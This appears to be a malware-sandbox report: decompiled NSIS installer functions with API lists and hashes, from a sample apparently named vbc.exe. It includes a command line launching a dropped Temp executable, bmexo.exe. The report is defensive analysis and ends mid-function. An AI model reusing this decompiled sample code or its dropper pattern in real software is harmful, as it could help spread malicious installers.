                                          				ScreenToClient(_t28,  &_v20);
                                          				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                          				if((_v12 & 0x00000066) != 0) {
                                          					_t15 = _v8;
                                          					goto L4;
                                          				}
                                          				return _t25 | 0xffffffff;
                                          			}

                                          APIs
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FA0
                                          • GetMessagePos.USER32 ref: 00404FA8
                                          • ScreenToClient.USER32(?,?), ref: 00404FC2
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FD4
                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FFA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: Message$Send$ClientScreen
                                          • String ID: f
                                          • API String ID: 41195575-1993550816
                                          • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                          • Instruction ID: 51d4338ac073bbeac8b2964ce5aa15998fcdd55d82c6f64f668885239b8ba4c4
                                          • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                          • Instruction Fuzzy Hash: D6015E7194021DBADB00DBA5DD85FFEBBBCAF54711F10012BBB50B61C0D7B49A058BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                                          				short _v132;
                                          				void* _t11;
                                          				WCHAR* _t19;
                                          
                                          				if(_a8 == 0x110) {
                                          					SetTimer(_a4, 1, 0xfa, 0);
                                          					_a8 = 0x113;
                                          				}
                                          				if(_a8 == 0x113) {
                                          					_t11 = E00403012();
                                          					_t19 = L"unpacking data: %d%%";
                                          					if( *0x7a8ab0 == 0) {
                                          						_t19 = L"verifying installer: %d%%";
                                          					}
                                          					wsprintfW( &_v132, _t19, _t11);
                                          					SetWindowTextW(_a4,  &_v132);
                                          					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                          				}
                                          				return 0;
                                          			}

                                          APIs
                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                          • wsprintfW.USER32 ref: 00402FE5
                                          • SetWindowTextW.USER32 ref: 00402FF5
                                          • SetDlgItemTextW.USER32 ref: 00403007
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: Text$ItemTimerWindowwsprintf
                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                          • API String ID: 1451636040-1158693248
                                          • Opcode ID: 863410c55cf87ff373a2389e5224159976098539ce34d2f9597aa36d95ce2bb5
                                          • Instruction ID: 8fb0b87627a2e5c232f470bc2292a7be8d93e7e9342cf65e243ccc0cc3a46c1c
                                          • Opcode Fuzzy Hash: 863410c55cf87ff373a2389e5224159976098539ce34d2f9597aa36d95ce2bb5
                                          • Instruction Fuzzy Hash: 74F0367050020DABEF246F50DD49BEA3B69EB40309F00C03AF606B51D0DBBD99549B59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 93%
                                          			E00402950(void* __ebx) {
                                          				WCHAR* _t26;
                                          				void* _t29;
                                          				long _t37;
                                          				void* _t49;
                                          				void* _t52;
                                          				void* _t54;
                                          				void* _t56;
                                          				void* _t59;
                                          				void* _t60;
                                          				void* _t61;
                                          
                                          				_t49 = __ebx;
                                          				_t52 = 0xfffffd66;
                                          				_t26 = E00402DA6(0xfffffff0);
                                          				_t55 = _t26;
                                          				 *(_t61 - 0x40) = _t26;
                                          				if(E00405FB4(_t26) == 0) {
                                          					E00402DA6(0xffffffed);
                                          				}
                                          				E00406139(_t55);
                                          				_t29 = E0040615E(_t55, 0x40000000, 2);
                                          				 *(_t61 + 8) = _t29;
                                          				if(_t29 != 0xffffffff) {
                                          					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                                          					if( *(_t61 - 0x28) != _t49) {
                                          						_t37 =  *0x7a8ab4;
                                          						 *(_t61 - 0x44) = _t37;
                                          						_t54 = GlobalAlloc(0x40, _t37);
                                          						if(_t54 != _t49) {
                                          							E004035FE(_t49);
                                          							E004035E8(_t54,  *(_t61 - 0x44));
                                          							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                                          							 *(_t61 - 0x10) = _t59;
                                          							if(_t59 != _t49) {
                                          								E00403377(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                                          								while( *_t59 != _t49) {
                                          									_t51 =  *_t59;
                                          									_t60 = _t59 + 8;
                                          									 *(_t61 - 0x3c) =  *_t59;
                                          									E00406119( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                                          									_t59 = _t60 +  *(_t61 - 0x3c);
                                          								}
                                          								GlobalFree( *(_t61 - 0x10));
                                          							}
                                          							E00406210( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                                          							GlobalFree(_t54);
                                          							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                                          						}
                                          					}
                                          					_t52 = E00403377(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                                          					CloseHandle( *(_t61 + 8));
                                          				}
                                          				_t56 = 0xfffffff3;
                                          				if(_t52 < _t49) {
                                          					_t56 = 0xffffffef;
                                          					DeleteFileW( *(_t61 - 0x40));
                                          					 *((intOrPtr*)(_t61 - 4)) = 1;
                                          				}
                                          				_push(_t56);
                                          				E00401423();
                                          				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t61 - 4));
                                          				return 0;
                                          			}

                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                          • GlobalFree.KERNEL32(?), ref: 00402A06
                                          • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                          • CloseHandle.KERNEL32(?), ref: 00402A35
                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                          • String ID:
                                          • API String ID: 2667972263-0
                                          • Opcode ID: 01061f3d3ca3a4d7c364cd067c19041a51f9a0b08810e1f4a161c9a0c4070a25
                                          • Instruction ID: ec4356a3eb6c7711b506d5a245a30aad41ccfdb787a60eec272099fea1c037c4
                                          • Opcode Fuzzy Hash: 01061f3d3ca3a4d7c364cd067c19041a51f9a0b08810e1f4a161c9a0c4070a25
                                          • Instruction Fuzzy Hash: D431C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E1CB798D419B98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 48%
                                          			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                          				void* _v8;
                                          				int _v12;
                                          				short _v536;
                                          				void* _t27;
                                          				signed int _t33;
                                          				intOrPtr* _t35;
                                          				signed int _t45;
                                          				signed int _t46;
                                          				signed int _t47;
                                          
                                          				_t46 = _a12;
                                          				_t47 = _t46 & 0x00000300;
                                          				_t45 = _t46 & 0x00000001;
                                          				_t27 = E004064DB(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                                          				if(_t27 == 0) {
                                          					if((_a12 & 0x00000002) == 0) {
                                          						L3:
                                          						_push(0x105);
                                          						_push( &_v536);
                                          						_push(0);
                                          						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                                          							__eflags = _t45;
                                          							if(__eflags != 0) {
                                          								L10:
                                          								RegCloseKey(_v8);
                                          								return 0x3eb;
                                          							}
                                          							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                                          							__eflags = _t33;
                                          							if(_t33 != 0) {
                                          								break;
                                          							}
                                          							_push(0x105);
                                          							_push( &_v536);
                                          							_push(_t45);
                                          						}
                                          						RegCloseKey(_v8);
                                          						_t35 = E00406A3B(3);
                                          						if(_t35 != 0) {
                                          							return  *_t35(_a4, _a8, _t47, 0);
                                          						}
                                          						return RegDeleteKeyW(_a4, _a8);
                                          					}
                                          					_v12 = 0;
                                          					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                                          						goto L10;
                                          					}
                                          					goto L3;
                                          				}
                                          				return _t27;
                                          			}

                                          APIs
                                          • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00402EFD
                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                          • RegCloseKey.ADVAPI32(?), ref: 00402F52
                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                          • RegCloseKey.ADVAPI32(?), ref: 00402F74
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: CloseEnum$DeleteValue
                                          • String ID:
                                          • API String ID: 1354259210-0
                                          • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                          • Instruction ID: e84adf69fee3246f56ef13a6fd4e717e0861f51d99737fac189c4d1833cff19f
                                          • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                          • Instruction Fuzzy Hash: 31213B7150010ABBDF11AF90CE89EEF7B7DEB54384F110076F909B21E0D7B59E54AA68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 77%
                                          			E00401D81(void* __ebx, void* __edx) {
                                          				struct HWND__* _t30;
                                          				WCHAR* _t38;
                                          				void* _t48;
                                          				void* _t53;
                                          				signed int _t55;
                                          				signed int _t60;
                                          				long _t63;
                                          				void* _t65;
                                          
                                          				_t53 = __ebx;
                                          				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                                          					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                                          				} else {
                                          					E00402D84(2);
                                          					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                                          				}
                                          				_t55 =  *(_t65 - 0x24);
                                          				 *(_t65 + 8) = _t30;
                                          				_t60 = _t55 & 0x00000004;
                                          				 *(_t65 - 0x38) = _t55 & 0x00000003;
                                          				 *(_t65 - 0x18) = _t55 >> 0x1f;
                                          				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                                          				if((_t55 & 0x00010000) == 0) {
                                          					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                                          				} else {
                                          					_t38 = E00402DA6(0x11);
                                          				}
                                          				 *(_t65 - 0x44) = _t38;
                                          				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                                          				asm("sbb esi, esi");
                                          				_t63 = LoadImageW( ~_t60 &  *0x7a8aa0,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                                          				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                                          				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                                          					DeleteObject(_t48);
                                          				}
                                          				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                                          					_push(_t63);
                                          					E004065B5();
                                          				}
                                          				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t65 - 4));
                                          				return 0;
                                          			}

                                          APIs
                                          • GetDlgItem.USER32(?,?), ref: 00401D9A
                                          • GetClientRect.USER32 ref: 00401DE5
                                          • LoadImageW.USER32 ref: 00401E15
                                          • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                          • DeleteObject.GDI32(00000000), ref: 00401E39
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                          • String ID:
                                          • API String ID: 1849352358-0
                                          • Opcode ID: f665995d6bdb305172d13ad54de642187c856862005d3c57e5c2f614b82d9191
                                          • Instruction ID: 474cd979728561ffe20026c9632071baa6ad0bc9fd2f813aa8d1396f3614d648
                                          • Opcode Fuzzy Hash: f665995d6bdb305172d13ad54de642187c856862005d3c57e5c2f614b82d9191
                                          • Instruction Fuzzy Hash: DC212672D00119AFCF05CBA4DE45AEEBBB5EF08304F14403AF945F62A0DB389951DB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 73%
                                          			E00401E4E(intOrPtr __edx) {
                                          				void* __edi;
                                          				int _t9;
                                          				signed char _t15;
                                          				struct HFONT__* _t18;
                                          				intOrPtr _t30;
                                          				void* _t31;
                                          				struct HDC__* _t33;
                                          				void* _t35;
                                          
                                          				_t30 = __edx;
                                          				_t33 = GetDC( *(_t35 - 8));
                                          				_t9 = E00402D84(2);
                                          				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                          				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                                          				ReleaseDC( *(_t35 - 8), _t33);
                                          				 *0x40ce08 = E00402D84(3);
                                          				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                                          				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                          				 *0x40ce0f = 1;
                                          				 *0x40ce0c = _t15 & 0x00000001;
                                          				 *0x40ce0d = _t15 & 0x00000002;
                                          				 *0x40ce0e = _t15 & 0x00000004;
                                          				E004066AB(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
                                          				_t18 = CreateFontIndirectW(0x40cdf8);
                                          				_push(_t18);
                                          				_push(_t31);
                                          				E004065B5();
                                          				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t35 - 4));
                                          				return 0;
                                          			}

                                          APIs
                                          • GetDC.USER32(?), ref: 00401E51
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                          • MulDiv.KERNEL32 ref: 00401E73
                                          • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                            • Part of subcall function 004066AB: lstrcatW.KERNEL32 ref: 00406850
                                            • Part of subcall function 004066AB: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA
                                          • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                          • String ID:
                                          • API String ID: 2584051700-0
                                          • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                          • Instruction ID: c4fbce1732c038d4ae3387388930f25584bd8a0c3a5059ecf0713bcf7412b626
                                          • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                          • Instruction Fuzzy Hash: 0E01B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 59%
                                          			E00401C43(intOrPtr __edx) {
                                          				int _t29;
                                          				long _t30;
                                          				signed int _t32;
                                          				WCHAR* _t35;
                                          				long _t36;
                                          				int _t41;
                                          				signed int _t42;
                                          				int _t46;
                                          				int _t56;
                                          				intOrPtr _t57;
                                          				struct HWND__* _t63;
                                          				void* _t64;
                                          
                                          				_t57 = __edx;
                                          				_t29 = E00402D84(3);
                                          				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                          				 *(_t64 - 0x18) = _t29;
                                          				_t30 = E00402D84(4);
                                          				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                          				 *(_t64 + 8) = _t30;
                                          				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                                          					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                                          				}
                                          				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                                          				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                                          					 *(_t64 + 8) = E00402DA6(0x44);
                                          				}
                                          				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                                          				_push(1);
                                          				if(__eflags != 0) {
                                          					_t61 = E00402DA6();
                                          					_t32 = E00402DA6();
                                          					asm("sbb ecx, ecx");
                                          					asm("sbb eax, eax");
                                          					_t35 =  ~( *_t31) & _t61;
                                          					__eflags = _t35;
                                          					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                          					goto L10;
                                          				} else {
                                          					_t63 = E00402D84();
                                          					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                          					_t41 = E00402D84(2);
                                          					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                          					_t56 =  *(_t64 - 0x1c) >> 2;
                                          					if(__eflags == 0) {
                                          						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                                          						L10:
                                          						 *(_t64 - 0x38) = _t36;
                                          					} else {
                                          						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                                          						asm("sbb eax, eax");
                                          						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                          					}
                                          				}
                                          				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                                          				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                                          					_push( *(_t64 - 0x38));
                                          					E004065B5();
                                          				}
                                          				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t64 - 4));
                                          				return 0;
                                          			}

                                          APIs
                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: MessageSend$Timeout
                                          • String ID: !
                                          • API String ID: 1777923405-2657877971
                                          • Opcode ID: a925d33b65f5538ff345f0f48edbd750304bc8babfa6be52d46d5660b496d1e6
                                          • Instruction ID: a8e9040b9442a73e8ccf438a9e221504da771f110143023329da3593775932a3
                                          • Opcode Fuzzy Hash: a925d33b65f5538ff345f0f48edbd750304bc8babfa6be52d46d5660b496d1e6
                                          • Instruction Fuzzy Hash: 2D219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 77%
                                          			E00404E77(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                          				char _v68;
                                          				char _v132;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t23;
                                          				signed int _t24;
                                          				void* _t31;
                                          				void* _t33;
                                          				void* _t34;
                                          				void* _t44;
                                          				signed int _t46;
                                          				signed int _t50;
                                          				signed int _t52;
                                          				signed int _t53;
                                          				signed int _t55;
                                          
                                          				_t23 = _a16;
                                          				_t53 = _a12;
                                          				_t44 = 0xffffffdc;
                                          				if(_t23 == 0) {
                                          					_push(0x14);
                                          					_pop(0);
                                          					_t24 = _t53;
                                          					if(_t53 < 0x100000) {
                                          						_push(0xa);
                                          						_pop(0);
                                          						_t44 = 0xffffffdd;
                                          					}
                                          					if(_t53 < 0x400) {
                                          						_t44 = 0xffffffde;
                                          					}
                                          					if(_t53 < 0xffff3333) {
                                          						_t52 = 0x14;
                                          						asm("cdq");
                                          						_t24 = 1 / _t52 + _t53;
                                          					}
                                          					_t25 = _t24 & 0x00ffffff;
                                          					_t55 = _t24 >> 0;
                                          					_t46 = 0xa;
                                          					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                          				} else {
                                          					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                          					_t50 = 0;
                                          				}
                                          				_t31 = E004066AB(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                          				_t33 = E004066AB(_t44, _t50, _t55,  &_v132, _t44);
                                          				_t34 = E004066AB(_t44, _t50, 0x7a1f88, 0x7a1f88, _a8);
                                          				wsprintfW(_t34 + lstrlenW(0x7a1f88) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                          				return SetDlgItemTextW( *0x7a7a78, _a4, 0x7a1f88);
                                          			}

                                          APIs
                                          • lstrlenW.KERNEL32(007A1F88,007A1F88,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F18
                                          • wsprintfW.USER32 ref: 00404F21
                                          • SetDlgItemTextW.USER32 ref: 00404F34
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: ItemTextlstrlenwsprintf
                                          • String ID: %u.%u%s%s
                                          • API String ID: 3540041739-3551169577
                                          • Opcode ID: 4298df8fa65d3e63540fdf60f99430adbe5e40f9a8b71c27c1b7671c68856ea4
                                          • Instruction ID: f4f79be78f3b00f65903d53a5db5cb29a0acdec533a94133042e7cdde7caf59d
                                          • Opcode Fuzzy Hash: 4298df8fa65d3e63540fdf60f99430adbe5e40f9a8b71c27c1b7671c68856ea4
                                          • Instruction Fuzzy Hash: 5711D5736041282BDB00A56DDD45E9F3288AB81334F250637FA25F21D1EA79882186E8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E00405F3D(WCHAR* _a4) {
                                          				WCHAR* _t9;
                                          
                                          				_t9 = _a4;
                                          				_push( &(_t9[lstrlenW(_t9)]));
                                          				_push(_t9);
                                          				if( *(CharPrevW()) != 0x5c) {
                                          					lstrcatW(_t9, 0x40a014);
                                          				}
                                          				return _t9;
                                          			}

                                          APIs
                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405F43
                                          • CharPrevW.USER32(?,00000000), ref: 00405F4D
                                          • lstrcatW.KERNEL32 ref: 00405F5F
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F3D
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: CharPrevlstrcatlstrlen
                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 2659869361-4017390910
                                          • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                          • Instruction ID: 4d139d42d978cba7810d0072a9498665e67a0d594e33c17037060be18c5eefd9
                                          • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                          • Instruction Fuzzy Hash: F6D0A771101A306EC1117B648C04CDF729CEE89344346443BF901B70A0CB7D1D5287FD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 89%
                                          			// Decompiled subclass window procedure. Message constants: 0x102 = WM_CHAR,
                                          			// 0x200 = WM_MOUSEMOVE, 0x419 = WM_USER+0x19, 0x413 = WM_USER+0x13; 0x20 = VK_SPACE.
                                          			// The original window procedure pointer is kept at 0x7a1f7c and is always called last.
                                          			E00405644(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                          				int _t15;
                                          				long _t16;
                                          
                                          				_t15 = _a8;
                                          				if(_t15 != 0x102) {
                                          					if(_t15 != 0x200) {
                                          						_t16 = _a16;
                                          						L7:
                                          						// WM_USER+0x19: remember the new lParam in the global at 0x7a1f74 and notify E00405005
